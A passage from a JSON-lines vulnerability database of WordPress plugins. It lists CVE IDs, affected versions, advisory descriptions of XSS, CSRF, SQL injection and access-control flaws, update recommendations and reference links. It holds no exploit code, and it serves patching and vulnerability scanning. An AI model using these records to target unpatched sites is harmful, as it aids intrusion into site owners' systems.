version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3192798%40simply-gallery-block%2Ftrunk&old=3176753%40simply-gallery-block%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3192798%40simply-gallery-block%2Ftrunk&old=3176753%40simply-gallery-block%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89bd70b2-0b5f-4edb-890b-d291bdb8a851?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89bd70b2-0b5f-4edb-890b-d291bdb8a851?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2434","slug":"wp-nested-pages","versionEndExcluding":"3.2.4","description":"The Nested Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'reset' function in versions up to, and including, 3.2.3. This makes it possible for authenticated attackers, with editor-level permissions and above, to reset plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919175%40wp-nested-pages&old=2814681%40wp-nested-pages&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2919175%40wp-nested-pages&old=2814681%40wp-nested-pages&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c3e61e9-3610-41b5-9820-28012dc657fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c3e61e9-3610-41b5-9820-28012dc657fd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/tags\\\/3.2.3\\\/app\\\/Form\\\/Listeners\\\/ResetSettings.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-nested-pages\\\/tags\\\/3.2.3\\\/app\\\/Form\\\/Listeners\\\/ResetSettings.php#L12\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3475","slug":"sticky-buttons","versionEndExcluding":"3.2.4","description":"The Sticky Buttons  WordPress plugin before 3.2.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf540242-5306-4c94-ad50-782d0d5b127f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf540242-5306-4c94-ad50-782d0d5b127f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10678","slug":"ultimate-blocks","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"The Ultimate Blocks  WordPress plugin before 3.2.4 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342c6a1-4f9a-45f3-911d-0dfee4657243\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9342c6a1-4f9a-45f3-911d-0dfee4657243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50459","slug":"wp-stripe-donation","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"Missing Authorization vulnerability in HM Plugin WordPress Stripe Donation and Payment Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Stripe Donation and Payment Plugin: from n\/a through 3.2.3.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-stripe-donation\\\/wordpress-aidwp-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-stripe-donation\\\/wordpress-aidwp-plugin-3-2-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8726","slug":"mailchimp-forms-by-mailmunch","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"The MailChimp Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1a1c5e7-75a4-4ca5-9707-4076b92e0c33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1a1c5e7-75a4-4ca5-9707-4076b92e0c33?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189361%40mailchimp-forms-by-mailmunch&new=3189361%40mailchimp-forms-by-mailmunch&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189361%40mailchimp-forms-by-mailmunch&new=3189361%40mailchimp-forms-by-mailmunch&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13749","slug":"stafflist","versionImpact":"3.2.3","versionEndExcluding":"3.2.4","description":"The StaffList plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing or incorrect nonce validation on the 'stafflist' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232922%40stafflist&new=3232922%40stafflist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3232922%40stafflist&new=3232922%40stafflist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8da640d-8965-45bb-be68-57d4eb598759?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8da640d-8965-45bb-be68-57d4eb598759?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8379","slug":"cost-calculator-builder","versionImpact":"3.2.38","versionEndExcluding":"3.2.39","description":"The Cost Calculator Builder WordPress plugin before 3.2.29 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.","recommendation":"Update to version 3.2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3463d5a-8215-4958-a6c0-039681c35a50\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a3463d5a-8215-4958-a6c0-039681c35a50\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6884","slug":"kadence-blocks","versionImpact":"3.2.28","versionEndExcluding":"3.2.39","description":"The Gutenberg Blocks with AI by Kadence WP  WordPress plugin before 3.2.39 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1768de0c-e4ea-4c98-abf1-7ac805f214b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1768de0c-e4ea-4c98-abf1-7ac805f214b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4863","slug":"kadence-blocks","versionImpact":"3.2.38","versionEndExcluding":"3.2.39","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018titleFont\u2019 parameter in all versions up to, and including, 3.2.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.39, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e0cde65-f75c-4602-bffe-97b391a428b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e0cde65-f75c-4602-bffe-97b391a428b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L276\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php#L276\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091170\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091170\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-testimonial-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4208","slug":"kadence-blocks","versionImpact":"3.2.37","versionEndExcluding":"3.2.38","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the typer effect in the advanced heading widget in all versions up to, and including, 3.2.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ea2bb8c-cc8b-49de-9c8e-2c8c0569f4ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ea2bb8c-cc8b-49de-9c8e-2c8c0569f4ac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3189","slug":"kadence-blocks","versionImpact":"3.2.37","versionEndExcluding":"3.2.38","description":"The Gutenberg Blocks by Kadence Blocks \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Testimonial', 'Progress Bar', 'Lottie Animations', 'Row Layout', 'Google Maps', and 'Advanced Gallery' blocks in all versions up to, and including, 3.2.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.38, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766b0bde-c555-40c1-b174-20045bd89c11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766b0bde-c555-40c1-b174-20045bd89c11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-lottie-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-lottie-block.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076712%40kadence-blocks&new=3076712%40kadence-blocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3076712%40kadence-blocks&new=3076712%40kadence-blocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3084683%40kadence-blocks&new=3084683%40kadence-blocks&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4057","slug":"kadence-blocks","versionImpact":"3.2.36","versionEndExcluding":"3.2.37","description":"The Gutenberg Blocks with AI by Kadence WP  WordPress plugin before 3.2.37 does not validate and escape some of its block attributes before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 3.2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da4d4d87-07b3-4f7d-bcbd-d29968a30b4f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/da4d4d87-07b3-4f7d-bcbd-d29968a30b4f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4481","slug":"kadence-blocks","versionImpact":"3.2.36","versionEndExcluding":"3.2.37","description":"The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' attribute of the plugin's blocks in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad0e4292-d890-499b-b70a-ed638d5b8ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad0e4292-d890-499b-b70a-ed638d5b8ee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4209","slug":"kadence-blocks","versionImpact":"3.2.36","versionEndExcluding":"3.2.37","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown timer in all versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.37, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cff2e5be-0de0-4e62-a881-6156760b7d99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cff2e5be-0de0-4e62-a881-6156760b7d99?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/dist\\\/blocks-countdown.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083616\\\/kadence-blocks\\\/trunk\\\/dist\\\/blocks-countdown.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13563","slug":"front-end-only-users","versionImpact":"3.2.30","versionEndExcluding":"3.2.31","description":"The Front End Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's forgot-password shortcode in all versions up to, and including, 3.2.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_Forgot_Password.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_Forgot_Password.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240349\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3240349\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-end-only-users\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/front-end-only-users\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51f3497f-c599-4d47-bd5a-94e1679a0025?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51f3497f-c599-4d47-bd5a-94e1679a0025?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5815","slug":"traffic-monitor","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Traffic Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tfcm_maybe_set_bot_flags() function in all versions up to, and including, 3.2.2. This makes it possible for unauthenticated attackers to disabled bot logging.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-monitor\\\/trunk\\\/traffic-monitor.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-monitor\\\/trunk\\\/traffic-monitor.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309996%40traffic-monitor&new=3309996%40traffic-monitor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3309996%40traffic-monitor&new=3309996%40traffic-monitor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538669c7-3237-4059-85dc-4f4af1ff5a19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538669c7-3237-4059-85dc-4f4af1ff5a19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7286","slug":"acf-quickedit-fields","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The plugin ACF Quick Edit Fields for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.2.2. This makes it possible for attackers without the edit_users capability to access metadata of other users, this includes contributor-level users and above.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5954bdc0-09e9-4691-95ff-02f7304514c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5954bdc0-09e9-4691-95ff-02f7304514c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=2828750%40acf-quickedit-fields&old=2816195%40acf-quickedit-fields#file89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=2828750%40acf-quickedit-fields&old=2816195%40acf-quickedit-fields#file89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3538e80e-c2c5-4e7b-97c3-b7debad7a136\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3538e80e-c2c5-4e7b-97c3-b7debad7a136\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3647","slug":"indigitall-web-push-notifications","versionEndExcluding":"3.2.3","description":"The IURNY by INDIGITALL WordPress plugin before 3.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6df05333-b1f1-4324-a1ba-dd36fbf1778c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6df05333-b1f1-4324-a1ba-dd36fbf1778c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4654","slug":"easy-pricing-tables","versionEndExcluding":"3.2.3","description":"The Pricing Tables WordPress Plugin WordPress plugin before 3.2.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a29744cd-b760-4757-8564-883d59fa4881\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a29744cd-b760-4757-8564-883d59fa4881\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0703","slug":"sticky-buttons","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Sticky Buttons \u2013 floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c070be-e955-4076-9878-0b1044766397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c070be-e955-4076-9878-0b1044766397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3182","slug":"restrict-content","versionEndExcluding":"3.2.3","description":"The Membership WordPress plugin before 3.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/655a68ee-9447-41ca-899e-986a419fb7ed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/655a68ee-9447-41ca-899e-986a419fb7ed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0374","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0373","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0372","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.","recommendation":"Update to version 3.2.3, or a newer patched 